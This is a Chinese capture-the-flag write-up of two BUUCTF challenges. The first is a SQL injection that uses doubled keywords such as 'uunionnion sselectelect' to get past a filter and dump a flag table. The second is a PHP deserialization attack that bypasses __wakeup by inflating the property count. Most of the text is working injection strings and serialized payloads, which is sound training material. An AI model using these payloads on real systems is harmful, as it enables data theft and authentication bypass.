BUUCTF——WEB(6)

Bug.ink2026-01-09 9:31

目录

[极客大挑战 2019BabySQL 1](#[极客大挑战 2019]BabySQL 1)

sql注入

[极客大挑战 2019PHP 1](#[极客大挑战 2019]PHP 1)

php反序列化

极客大挑战 2019BabySQL 1

sql注入

尝试万能密码

复制代码 
1' or 1=1#

123

尝试联合查询

复制代码 
1' order by 1#

123

or 和 by都被过滤

尝试双写绕过

复制代码 
1' oorrder bbyy 2#

123

双写绕过可行

联合查询深度利用

尝试

复制代码 
1' oorrder bbyy 4#

123

出现报错

则所查询的数据表有三列

构造查询

复制代码 
1' union select 1,2,3#

123

union select 被过滤

再次尝试双写

复制代码 
1' uunionnion sselectelect 1,2,3#

123

根据回显,查找数据

复制代码 
1' uunionnion sselectelect 1,database(),version()#

123
复制代码 
1' uunionnion sselectelect 1,database(),group_concat(table_name) from information_schema.tables where table_schema=geek#

123

报错,因为字符中的or被过滤,

经过测试where,from都被过滤

继续双写

复制代码 
1' uunionnion sselectelect 1,database(),group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#

123

好像在当前查询数据库中,没有相关表,

继续查看数据库

复制代码 
1' uunionnion sselectelect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata#

123

有一个ctf数据库,

尝试注入ctf数据库中的数据表

复制代码 
1' uunionnion sselectelect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='ctf'#

123

数据表为Flag表,查询列名

复制代码 
1' uunionnion sselectelect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema='ctf'#

123

Flag表中又一个字段flag

查询flag字段数据

复制代码 
1' uunionnion sselectelect 1,2,group_concat(flag) frfromom ctf.Flag#

123

极客大挑战 2019PHP 1

php反序列化

网站备份

进行目录爆破,查找备份文件

访问www.zip发现源码泄露

提交查看是错误的

查看index.php

存在反序列化函数 unserialize()

unserialize() 是 PHP 中专门用于 "反序列化" 的函数,作用是将序列化后的字符串还原为 PHP 对象 / 数据结构,这是反序列化操作的标志性函数。

$select = $_GET['select']; 表示:$select 的值是从 URL 的 GET 参数(?select=xxx)中获取的,用户可以自定义传入任意内容

包含class.php并且有一个反序列化点

核心逻辑与漏洞点分析

先拆解 Name 类的关键魔术方法和限制条件,明确利用目标:

关键绕过技巧

  • PHP 存在一个经典漏洞(PHP < 5.6.25/7.0.10):当序列化字符串中声明的属性数量 > 类实际的属性数量 时,__wakeup 不会被触发。
  • 本类实际属性数是 2($username$password),只需把序列化字符串中的属性数从 2 改成 3 即可绕过。

构造反序列化 Payload

查看class.php

思路:username值为admin,password值为100,可以输出flag

构造反序列化payload

复制代码 
<?php
class Name{
    private $username = 'admin';
    private $password = '100';
}
$a= new Name();
$res=serialize(@$a);   
echo $res
?>

输出反序列化字符串

复制代码 
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

这里我们发现Nameusername与前面的14不对应,少了两个字符,而Namepassword也是少了两个字符,这是因为username和password变量是private类型,变量中的类名前后会有空白符

Name前后需要添加%00

同时要绕过_wakeup(),还要将Name后面的数字修改为大于2的数。

结果:

复制代码 
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

get传参:

复制代码 
?select=O:4:"Name":4:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}
相关推荐
倔强的石头_2 天前
《Kingbase护城河》——数据库存储空间全景探测与精细化瘦身实战
数据库
云技纵横2 天前
唯一索引 INSERT 死锁实战:5 秒复现交叉插入的 S 锁循环等待
sql·mysql
冬奇Lab2 天前
每日一个开源项目(第134篇):Zvec - 阿里开源的嵌入式向量数据库,向量搜索界的 SQLite
数据库·人工智能·llm
ClouGence3 天前
Oracle CDC 架构优化:从主库直连到 DataGuard 备库同步
数据库·后端·oracle
无响应de神3 天前
三、用户与权限管理
数据库·mysql
麦聪聊数据4 天前
数据服务化时代:企业数据能力输出的核心路径
数据库
shushangyun_4 天前
2026年快消品B2B系统推荐:支持终端门店订货、促销政策自动化的工具?
java·运维·网络·数据库·人工智能·spring·自动化
DARLING Zero two♡4 天前
【MySQL数据库】数据类型与表约束
数据库·mysql
零零信安4 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安
曹牧4 天前
Oracle EXPLAIN PLAN
数据库·oracle
热门推荐
012026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?022026年6月AI大模型全景报告:GPT-5.6、Claude Opus 4.8、Gemini 3.5,中美AI三足鼎立谁主沉浮?03【AI】2026 年具身智能模型和世界模型总结042026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf05GitHub 镜像站点06AI科技热点日报 | 2026年6月1日07AI一周事件 · 2026-06-03 至 2026-06-0908上线仅72小时被强制下架:Claude Fable 5 的短命09Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析102026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?